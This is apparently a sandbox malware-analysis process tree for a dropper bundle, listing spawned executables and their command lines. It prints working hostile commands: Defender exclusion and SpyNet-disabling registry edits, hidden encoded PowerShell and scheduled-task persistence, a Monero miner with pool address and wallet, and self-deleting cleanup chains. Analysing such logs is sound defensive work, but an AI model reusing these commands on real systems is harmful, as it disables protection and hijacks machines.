C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵PID:6136
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵PID:5224
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵PID:5608
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵PID:6024
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵PID:5572
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵PID:5948
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵PID:6124
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaPwVqweL" /SC once /ST 04:21:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
PID:1300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaPwVqweL"11⤵PID:3268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaPwVqweL"11⤵PID:1856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\oQArwaz.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:5028
-
-
-
-
-
C:\Users\Admin\Documents\y2rsVPiJM9oI3RayuEyLa_w4.exe"C:\Users\Admin\Documents\y2rsVPiJM9oI3RayuEyLa_w4.exe" /mixtwo8⤵PID:2988
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "y2rsVPiJM9oI3RayuEyLa_w4.exe" /f & erase "C:\Users\Admin\Documents\y2rsVPiJM9oI3RayuEyLa_w4.exe" & exit9⤵PID:984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "y2rsVPiJM9oI3RayuEyLa_w4.exe" /f10⤵
- Kills process with taskkill
PID:2244
-
-
-
-
C:\Users\Admin\Documents\ktf7QOp7_yIn2_6EXKVpGjM6.exe"C:\Users\Admin\Documents\ktf7QOp7_yIn2_6EXKVpGjM6.exe"8⤵PID:2484
-
-
C:\Users\Admin\Documents\weXdBCzndkkkHRZCO7YnMzCJ.exe"C:\Users\Admin\Documents\weXdBCzndkkkHRZCO7YnMzCJ.exe"8⤵PID:3608
-
-
-
-
C:\Users\Admin\Documents\EpizRdrEBst8YazhNi_fC5CZ.exe"C:\Users\Admin\Documents\EpizRdrEBst8YazhNi_fC5CZ.exe"6⤵PID:2348
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵PID:3984
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:3976
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:3964
-
-
-
C:\Users\Admin\Documents\uwfBo5kkMVvEWC5OgvPySWWm.exe"C:\Users\Admin\Documents\uwfBo5kkMVvEWC5OgvPySWWm.exe"6⤵PID:2648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "uwfBo5kkMVvEWC5OgvPySWWm.exe" /f & erase "C:\Users\Admin\Documents\uwfBo5kkMVvEWC5OgvPySWWm.exe" & exit7⤵PID:3868
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "uwfBo5kkMVvEWC5OgvPySWWm.exe" /f8⤵
- Kills process with taskkill
PID:1108
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Loads dropped DLL
PID:308 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Loads dropped DLL
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1808 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3036
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 3166⤵
- Program crash
PID:1756
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Loads dropped DLL
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
PID:1648 -
C:\Users\Admin\AppData\Roaming\1874867.scr"C:\Users\Admin\AppData\Roaming\1874867.scr" /S6⤵PID:1156
-
-
C:\Users\Admin\AppData\Roaming\4925280.scr"C:\Users\Admin\AppData\Roaming\4925280.scr" /S6⤵PID:2448
-
C:\Users\Admin\AppData\Roaming\4925280.scr"C:\Users\Admin\AppData\Roaming\4925280.scr"7⤵PID:4084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 7727⤵
- Program crash
PID:3188
-
-
-
C:\Users\Admin\AppData\Roaming\1768208.scr"C:\Users\Admin\AppData\Roaming\1768208.scr" /S6⤵PID:2312
-
-
C:\Users\Admin\AppData\Roaming\5958442.scr"C:\Users\Admin\AppData\Roaming\5958442.scr" /S6⤵PID:3020
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Loads dropped DLL
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Loads dropped DLL
PID:1052 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1424 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun19de8ff4b6aefeb8.exe" & exit6⤵PID:2844
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun19de8ff4b6aefeb8.exe" /f7⤵
- Kills process with taskkill
PID:2928
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Loads dropped DLL
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵PID:1872
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2960
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2952
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2228
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:2816
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:4496
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:4920
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:4848
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:6028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:636
-
C:\ProgramData\4283947.exe"C:\ProgramData\4283947.exe"8⤵PID:2900
-
-
C:\ProgramData\5605280.exe"C:\ProgramData\5605280.exe"8⤵PID:2184
-
-
C:\ProgramData\4350386.exe"C:\ProgramData\4350386.exe"8⤵PID:1880
-
C:\ProgramData\4350386.exe"C:\ProgramData\4350386.exe"9⤵PID:5516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 7649⤵
- Program crash
PID:5612
-
-
-
C:\ProgramData\724774.exe"C:\ProgramData\724774.exe"8⤵PID:1956
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:3176
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3176 -s 14328⤵
- Program crash
PID:2204
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:3336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:3620
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\tmp702_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp702_tmp.exe"8⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\tmp702_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp702_tmp.exe9⤵PID:3636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2832
-
C:\Users\Admin\AppData\Local\Temp\is-SSE3O.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-SSE3O.tmp\setup_2.tmp" /SL5="$10398,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:4756
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:4660
-
C:\Users\Admin\AppData\Local\Temp\is-511O8.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-511O8.tmp\setup_2.tmp" /SL5="$2040A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\is-IAE48.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-IAE48.tmp\postback.exe" ss111⤵PID:4332
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:5696
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QRlIyCujj.dll"13⤵PID:3268
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QRlIyCujj.dll"14⤵PID:1460
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\QRlIyCujj.dll"15⤵PID:5048
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QRlIyCujj.dllTiayEwa0j.dll"13⤵PID:4192
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QRlIyCujj.dllTiayEwa0j.dll"14⤵PID:5528
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:3752
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:4728
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:1716
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2364
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
- Loads dropped DLL
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\tmp4D0_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp4D0_tmp.exe"6⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\tmp4D0_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp4D0_tmp.exe7⤵PID:4732
-
-
C:\Users\Admin\AppData\Local\Temp\tmp4D0_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp4D0_tmp.exe7⤵PID:2860
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\is-F2JR2.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-F2JR2.tmp\Sun1966fb31dd5a07.tmp" /SL5="$30160,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\is-KFVST.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-KFVST.tmp\Ze2ro.exe" /S /UID=burnerch27⤵PID:2676
-
C:\Program Files\Java\TDKATRGABL\ultramediaburner.exe"C:\Program Files\Java\TDKATRGABL\ultramediaburner.exe" /VERYSILENT8⤵PID:2260
-
C:\Users\Admin\AppData\Local\Temp\is-VSRQA.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-VSRQA.tmp\ultramediaburner.tmp" /SL5="$30174,281924,62464,C:\Program Files\Java\TDKATRGABL\ultramediaburner.exe" /VERYSILENT9⤵PID:3252
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:3956
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b9-fadef-431-f739c-7423744ee9755\Cicaborile.exe"C:\Users\Admin\AppData\Local\Temp\b9-fadef-431-f739c-7423744ee9755\Cicaborile.exe"8⤵PID:3412
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3864
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3864 CREDAT:275457 /prefetch:210⤵PID:4244
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3864 CREDAT:5583874 /prefetch:210⤵PID:2644
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:1772
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:210⤵PID:6676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2a-55325-754-221ab-89d5d21dec317\Deneshigygi.exe"C:\Users\Admin\AppData\Local\Temp\2a-55325-754-221ab-89d5d21dec317\Deneshigygi.exe"8⤵PID:3468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5frnkavn.wt4\GcleanerEU.exe /eufive & exit9⤵PID:7064
-
C:\Users\Admin\AppData\Local\Temp\5frnkavn.wt4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\5frnkavn.wt4\GcleanerEU.exe /eufive10⤵PID:6680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\5frnkavn.wt4\GcleanerEU.exe" & exit11⤵PID:6484
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:4620
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mvt0nunn.0u5\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:6692
-
C:\Users\Admin\AppData\Local\Temp\mvt0nunn.0u5\installer.exeC:\Users\Admin\AppData\Local\Temp\mvt0nunn.0u5\installer.exe /qn CAMPAIGN="654"10⤵PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vivobokz.mri\anyname.exe & exit9⤵PID:6840
-
C:\Users\Admin\AppData\Local\Temp\vivobokz.mri\anyname.exeC:\Users\Admin\AppData\Local\Temp\vivobokz.mri\anyname.exe10⤵PID:6944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dg0b4ncd.vef\gcleaner.exe /mixfive & exit9⤵PID:2704
-
C:\Users\Admin\AppData\Local\Temp\dg0b4ncd.vef\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\dg0b4ncd.vef\gcleaner.exe /mixfive10⤵PID:5416
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dg0b4ncd.vef\gcleaner.exe" & exit11⤵PID:6872
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:3680
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
- Loads dropped DLL
PID:1628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Loads dropped DLL
PID:1732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
- Loads dropped DLL
PID:1040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun1905815e51282417.exeSun1905815e51282417.exe1⤵PID:2072
-
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 9522⤵
- Program crash
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2152
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "645009421-17953705781282408994-584299574116621714090363166612747774-1780372322"1⤵
- Executes dropped EXE
PID:1872
-
C:\Users\Admin\AppData\Local\Temp\6A27.exeC:\Users\Admin\AppData\Local\Temp\6A27.exe1⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\DDA2.exeC:\Users\Admin\AppData\Local\Temp\DDA2.exe1⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\DDA2.exeC:\Users\Admin\AppData\Local\Temp\DDA2.exe2⤵PID:4140
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\2e8e9a6e-8ec8-4e15-8bc5-86eac450027a" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4588
-
-
C:\Users\Admin\AppData\Local\Temp\DDA2.exe"C:\Users\Admin\AppData\Local\Temp\DDA2.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\DDA2.exe"C:\Users\Admin\AppData\Local\Temp\DDA2.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:4876
-
C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build2.exe"C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build2.exe"5⤵PID:5672
-
C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build2.exe"C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build2.exe"6⤵PID:4100
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:2708
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:2240
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:6580
-
-
-
-
-
C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build3.exe"C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build3.exe"5⤵PID:4764
-
C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build3.exe"C:\Users\Admin\AppData\Local\d83f92dc-4087-4c4a-984d-16fd75e041af\build3.exe"6⤵PID:5036
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:4980
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E44.exeC:\Users\Admin\AppData\Local\Temp\E44.exe1⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\62DA.exeC:\Users\Admin\AppData\Local\Temp\62DA.exe1⤵PID:2684
-
C:\Users\Admin\AppData\Local\Temp\62DA.exeC:\Users\Admin\AppData\Local\Temp\62DA.exe2⤵PID:4064
-
-
C:\Users\Admin\AppData\Local\Temp\824D.exeC:\Users\Admin\AppData\Local\Temp\824D.exe1⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\A538.exeC:\Users\Admin\AppData\Local\Temp\A538.exe1⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\A538.exeC:\Users\Admin\AppData\Local\Temp\A538.exe2⤵PID:5112
-
-
C:\Users\Admin\AppData\Local\Temp\20FD.exeC:\Users\Admin\AppData\Local\Temp\20FD.exe1⤵PID:5956
-
C:\Users\Admin\AppData\Local\Temp\53C1.exeC:\Users\Admin\AppData\Local\Temp\53C1.exe1⤵PID:4996
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5528 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\8897.exeC:\Users\Admin\AppData\Local\Temp\8897.exe1⤵PID:2944
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\8897.exe"2⤵PID:4380
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:2272
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {46E3F535-BB64-4413-B90C-5007C6BAFE6F} S-1-5-21-2375386074-2889020035-839874990-1000:AFOWCZMM\Admin:Interactive:[1]1⤵PID:5488
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:6136
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:3672
-
-
C:\Users\Admin\AppData\Roaming\vtfisatC:\Users\Admin\AppData\Roaming\vtfisat2⤵PID:1060
-
-
C:\Users\Admin\AppData\Roaming\gsfisatC:\Users\Admin\AppData\Roaming\gsfisat2⤵PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\FCCE.exeC:\Users\Admin\AppData\Local\Temp\FCCE.exe1⤵PID:4804
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vgznemm\2⤵PID:5152
-
-
